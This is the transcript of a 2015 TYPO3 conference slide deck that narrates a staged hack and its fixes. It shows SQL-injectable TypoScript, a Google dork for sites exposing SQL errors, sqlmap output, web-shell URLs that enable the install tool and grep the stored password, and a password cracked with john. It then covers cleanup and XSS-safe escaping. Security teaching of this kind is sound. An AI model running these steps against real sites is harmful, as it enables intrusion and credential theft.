Secure TYPO3 - Diary of a Hack
49
Inspiring people to share #CertiFUNcation - Brühl 2015 Secure TYPO3 CertiFUNcation - Brühl 2015 Helmut Hummel <[email protected]> 05.06.2015 Secure TYPO3 1
-
Upload
helmut-hummel -
Category
Technology
-
view
124 -
download
8
Transcript of Secure TYPO3 - Diary of a Hack
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
CertiFUNcation - Brühl 2015
Helmut Hummel <[email protected]>
05.06.2015
Secure TYPO3
1
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
#CertiFUNcation 2015
Agenda• Diary of a Hack
• Further Pitfalls
• Best Practice
2
Diary of a Hack
3
Diary of a Hack
Day 1 - Implementing a feature
4
Diary of a Hack
5
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }
Diary of a Hack
6
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }
Diary of a Hack
Day 2 - Testing the feature
7
Diary of a Hack
8
Diary of a Hack
9
'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'
Diary of a Hack
10
Diary of a Hack
11
'DB/username' => 'root'
Diary of a Hack
12
Diary of a Hack
Day 3 - Distraction
13
Diary of a Hack
14
Diary of a Hack
Day 4 - Attraction
15
Diary of a Hack
16
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Diary of a Hack
Day 5 - Exploitation
17
Diary of a Hack
18
$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
Diary of a Hack
19
Diary of a Hack
20
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
Diary of a Hack
21
$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
Diary of a Hack
22
Diary of a Hack
Day 5 - Discovery
23
Diary of a Hack
Discovery• Take site offline!
• seriously
• I mean it
24
Diary of a Hack
Day 6 - Analysis
25
Diary of a Hack
Analysis• Make a backup of current state (files, DB)
• Search all logs for „suspicious“ entries
• Try to reproduce assumed entry points
• If in doubt: get help
26
Diary of a Hack
Day 7 - Fix
27
Diary of a Hack
28
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }
Diary of a Hack
29
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }
Diary of a Hack
Fix• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
30
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Further Pitfalls
31
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3 32
Secure TYPO3
Types of Security Threats• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack
33
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
TypoScript
34
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
35
page.10 = TEXT # title can contain: {DB:be_users:1:password} page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
36
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
37
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
38
page.10 = TEXT # title can contain HTML page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
39
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
40
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
41
page.10 = TEXT # Avoid dataWrap or insertData if possible # layout field might not be safe page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
42
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Fluid
43
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Extbase
XSS even when using Fluid• Flash Messages
• HTML Context
• Custom View Helpers
44
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Best Practice
45
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Best Practice• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/
46
Questions?
47
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Secure TYPO3 - Diary of a Hack
Resources• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/
48
